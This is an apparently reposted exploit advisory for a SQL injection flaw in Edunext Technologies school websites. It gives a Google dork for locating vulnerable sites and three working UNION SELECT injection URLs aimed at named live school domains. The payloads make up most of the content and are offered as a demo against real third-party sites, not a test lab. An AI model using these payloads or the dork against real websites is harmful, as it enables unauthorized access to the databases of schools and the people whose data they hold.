2023-10-2 05:6:8 Author: cxsecurity.com(查看原文) 阅读量:11 收藏
Edunext Technologies - Sql Injection Vulnerability********************************************************* #Exploit Title: Edunext Technologies - Sql Injection Vulnerability #Date: 2023-09-30 #Exploit Author: Behrouz Mansoori #Google Dork: "Powered by Edunext Technologies" #Category:webapps #Tested On: Mac, Firefox Proof of Concept: ### Demo : https://sfsindirapuram.com/Recent-Activities-Detail.php?id=-62%27%20union%20select%20version(),2,3,4,5--+ https://sunvalleyncr.in/Events-Detail.php?id=-41%27%20union%20select%20version(),2,3,4,5--+ https://kvmpublicschool.org/notice.php?id=-33%20union%20select%201,version(),3,4,5,6,7,8,9--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Thanks for you comment!
|
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2023, cxsecurity.com
如有侵权请联系:admin#unsafe.sh